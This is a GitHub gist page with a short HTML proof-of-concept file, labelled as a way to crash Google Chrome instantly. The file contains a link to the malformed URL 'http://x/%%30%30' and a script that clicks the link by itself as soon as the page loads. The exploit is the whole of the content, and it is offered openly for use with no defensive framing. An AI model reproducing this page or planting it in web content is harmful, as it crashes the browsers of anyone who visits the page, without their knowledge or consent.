Skip to content

Instantly share code, notes, and snippets.

@akshatmittal
Last active September 19, 2015 11:18
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save akshatmittal/9398ba45208985a81bac to your computer and use it in GitHub Desktop.
Save akshatmittal/9398ba45208985a81bac to your computer and use it in GitHub Desktop.
Crash Google Chrome instantly. Proof-of-concept code.
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Chrome Crash</title>
</head>
<body>
<a href="http://x/%%30%30" id="tep">Crash Chrome</a>
<script>document.getElementById('tep').click();</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment